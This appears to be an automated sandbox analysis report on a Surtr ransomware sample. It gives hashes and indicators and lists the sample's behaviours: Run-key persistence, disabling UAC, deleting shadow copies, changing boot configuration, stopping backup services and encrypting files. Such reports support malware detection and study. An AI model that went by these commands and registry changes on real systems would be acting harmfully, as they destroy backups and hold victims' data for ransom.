Analysis
-
max time kernel
173s -
max time network
64s -
platform
windows7_x64 -
resource
win7-20220812-en -
resource tags
arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system -
submitted
09-11-2022 16:00
Behavioral task
behavioral1
Sample
459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
Resource
win7-20220812-en
Behavioral task
behavioral2
Sample
459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
Resource
win10v2004-20220812-en
General
-
Target
459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe
-
Size
333KB
-
MD5
393e9f112cc999ebd9333877bcc7535e
-
SHA1
ed65581b6c3980b3ddf623a4d2f61ce08ce59bdf
-
SHA256
459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712
-
SHA512
021116a238f84e003ba6a5817b4d6ed27637ed6bc1d6d424533813d70964953c9deb1c62e94bae89db7c59f09dcc76ee5c92ad66c8e7688cd0d4643bc6d72c83
-
SSDEEP
6144:05qtAQ4n9hFPMRp8wayVlTrsusy6szJzHRhDK:MqtYHU8NqrskxHRhDK
Malware Config
Extracted
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\SURTR_README.hta
surtr
Signatures
-
Detects Surtr Payload 1 IoCs
resource yara_rule behavioral1/memory/1004-58-0x000000013FBB0000-0x000000013FD11000-memory.dmp family_surtr -
Surtr
Ransomware family first seen in late 2021.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" reg.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 1168 bcdedit.exe 1968 bcdedit.exe -
Disables Task Manager via registry modification
-
Disables use of System Restore points 1 TTPs
-
resource yara_rule behavioral1/memory/1004-58-0x000000013FBB0000-0x000000013FD11000-memory.dmp upx behavioral1/files/0x0003000000005ae6-121.dat upx -
Drops startup file 6 IoCs
description ioc Process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.hta cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SURTR_README.txt cmd.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe cmd.exe File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Surtr.exe cmd.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchos2 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\svchos3 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\svchos4 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svchos1 = "C:\\ProgramData\\Service\\Surtr.exe" reg.exe Key created \REGISTRY\USER\S-1-5-21-3845472200-3839195424-595303356-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run reg.exe -
Enumerates connected drives 3 TTPs 24 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\W: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\Y: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\B: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\I: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\L: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\O: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\A: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\H: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\K: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\M: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\T: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\G: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\P: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\Q: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\N: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\R: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\S: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\U: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\V: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\E: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\F: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\J: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\X: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened (read-only) \??\Z: 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 2 ip-api.com -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02742G.GIF.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\org-netbeans-swing-outline.jar.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Common Files\System\msadc\msaddsr.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00455_.WMF.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring-impl_zh_CN.jar.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-selector-ui.jar.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.5\System.Core.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\it-IT\sqloledb.rll.mui.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\Locales\ta.pak.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Google\Update\1.3.36.71\goopdateres_pt-PT.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341344.JPG.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\keypad\kor-kor.xml.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\btn_close_down_BIDI.png.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\submission_history.gif.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02738U.BMP.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\36.png.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Acrofx32.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301044.WMF.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\management\snmp.acl.template.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\codec\librawvideo_plugin.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Google\Chrome\Application\89.0.4389.114\chrome.dll.sig.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\GMT-9.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\vi\LC_MESSAGES\vlc.mo.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-netbeans-modules-core-kit.xml.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\css\settings.css.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Common Files\SpeechEngines\Microsoft\TTS20\en-US\enu-dsk\M1033DSK.APL.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\SlideShow.Gadget\images\next_hov.png.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_blue_partly-cloudy.png.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0148757.JPG.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Bogota.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Etc\UCT.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Media Player\Network Sharing\wmpnss_bw48.png.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\System.IdentityModel.Resources.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Campo_Grande.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.osgi_3.10.1.v20140909-1633.jar.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Mozilla Firefox\removed-files.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Common Files\System\Ole DB\oledb32r.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Media Player\ja-JP\WMPMediaSharing.dll.mui.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\Images\settings_corner_bottom_left.png.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\MSOXMLMF.DLL.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-oql_ja.jar.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_zh_CN.jar.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\crashreporter-override.ini.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Windows Journal\Templates\To_Do_List.jtp.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Common Files\System\Ole DB\sqloledb.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0282126.WMF.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\BabyGirl\16_9-frame-background.png.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\Push\1047x576black.png.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.swt.win32.win32.x86_64.nl_zh_4.4.0.v20140623020002.jar.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\VideoLAN\VLC\plugins\packetizer\libpacketizer_mpeg4video_plugin.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\en-US\delete.avi.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Bissau.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\ja\System.Printing.resources.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Common Files\Microsoft Shared\Stationery\ShadesOfBlue.jpg.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.services.nl_ja_4.4.0.v20140623020002.jar.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\OFFICE14\1033\xlsrvintl.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0289430.JPG.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA02451_.WMF.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Europe\Chisinau.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files\Reference Assemblies\Microsoft\Framework\v3.0\PresentationCore.dll.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf.[[email protected]].SURT 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 516 schtasks.exe 1956 schtasks.exe -
Interacts with shadow copies 2 TTPs 3 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
pid Process 1856 vssadmin.exe 708 vssadmin.exe 1320 vssadmin.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeBackupPrivilege 576 vssvc.exe Token: SeRestorePrivilege 576 vssvc.exe Token: SeAuditPrivilege 576 vssvc.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1004 wrote to memory of 1584 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 28 PID 1004 wrote to memory of 1584 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 28 PID 1004 wrote to memory of 1584 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 28 PID 1004 wrote to memory of 1164 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 29 PID 1004 wrote to memory of 1164 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 29 PID 1004 wrote to memory of 1164 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 29 PID 1004 wrote to memory of 1412 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 30 PID 1004 wrote to memory of 1412 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 30 PID 1004 wrote to memory of 1412 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 30 PID 1412 wrote to memory of 628 1412 cmd.exe 31 PID 1412 wrote to memory of 628 1412 cmd.exe 31 PID 1412 wrote to memory of 628 1412 cmd.exe 31 PID 1004 wrote to memory of 320 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 33 PID 1004 wrote to memory of 320 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 33 PID 1004 wrote to memory of 320 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 33 PID 1004 wrote to memory of 2040 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 32 PID 1004 wrote to memory of 2040 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 32 PID 1004 wrote to memory of 2040 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 32 PID 1004 wrote to memory of 1764 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 34 PID 1004 wrote to memory of 1764 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 34 PID 1004 wrote to memory of 1764 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 34 PID 2040 wrote to memory of 1144 2040 cmd.exe 35 PID 2040 wrote to memory of 1144 2040 cmd.exe 35 PID 2040 wrote to memory of 1144 2040 cmd.exe 35 PID 320 wrote to memory of 1856 320 cmd.exe 36 PID 320 wrote to memory of 1856 320 cmd.exe 36 PID 320 wrote to memory of 1856 320 cmd.exe 36 PID 1764 wrote to memory of 708 1764 cmd.exe 37 PID 1764 wrote to memory of 708 1764 cmd.exe 37 PID 1764 wrote to memory of 708 1764 cmd.exe 37 PID 1144 wrote to memory of 1716 1144 net.exe 38 PID 1144 wrote to memory of 1716 1144 net.exe 38 PID 1144 wrote to memory of 1716 1144 net.exe 38 PID 1004 wrote to memory of 1112 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 39 PID 1004 wrote to memory of 1112 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 39 PID 1004 wrote to memory of 1112 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 39 PID 1112 wrote to memory of 516 1112 cmd.exe 41 PID 1112 wrote to memory of 516 1112 cmd.exe 41 PID 1112 wrote to memory of 516 1112 cmd.exe 41 PID 516 wrote to memory of 316 516 net.exe 42 PID 516 wrote to memory of 316 516 net.exe 42 PID 516 wrote to memory of 316 516 net.exe 42 PID 1004 wrote to memory of 1428 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 43 PID 1004 wrote to memory of 1428 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 43 PID 1004 wrote to memory of 1428 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 43 PID 1428 wrote to memory of 2012 1428 cmd.exe 45 PID 1428 wrote to memory of 2012 1428 cmd.exe 45 PID 1428 wrote to memory of 2012 1428 cmd.exe 45 PID 2012 wrote to memory of 1100 2012 net.exe 46 PID 2012 wrote to memory of 1100 2012 net.exe 46 PID 2012 wrote to memory of 1100 2012 net.exe 46 PID 1004 wrote to memory of 1148 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 47 PID 1004 wrote to memory of 1148 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 47 PID 1004 wrote to memory of 1148 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 47 PID 1148 wrote to memory of 2020 1148 cmd.exe 48 PID 1148 wrote to memory of 2020 1148 cmd.exe 48 PID 1148 wrote to memory of 2020 1148 cmd.exe 48 PID 2020 wrote to memory of 1952 2020 net.exe 49 PID 2020 wrote to memory of 1952 2020 net.exe 49 PID 2020 wrote to memory of 1952 2020 net.exe 49 PID 1004 wrote to memory of 1264 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 50 PID 1004 wrote to memory of 1264 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 50 PID 1004 wrote to memory of 1264 1004 459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe 50 PID 1264 wrote to memory of 1932 1264 cmd.exe 51 -
Views/modifies file attributes 1 TTPs 2 IoCs
pid Process 1792 attrib.exe 1780 attrib.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe"C:\Users\Admin\AppData\Local\Temp\459c6aa44a4e4a04d5f49a32b772d5f3452af77e1aa3fa528061f61e2dc8f712.exe"1⤵
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:1004 -
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c mkdir C:\ProgramData\Service2⤵PID:1584
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c @echo off2⤵PID:1164
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c chcp 4372⤵
- Suspicious use of WriteProcessMemory
PID:1412 -
C:\Windows\system32\chcp.comchcp 4373⤵PID:628
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net stop "Acronis VSS Provider"2⤵
- Suspicious use of WriteProcessMemory
PID:2040 -
C:\Windows\system32\net.exenet stop "Acronis VSS Provider"3⤵
- Suspicious use of WriteProcessMemory
PID:1144 -
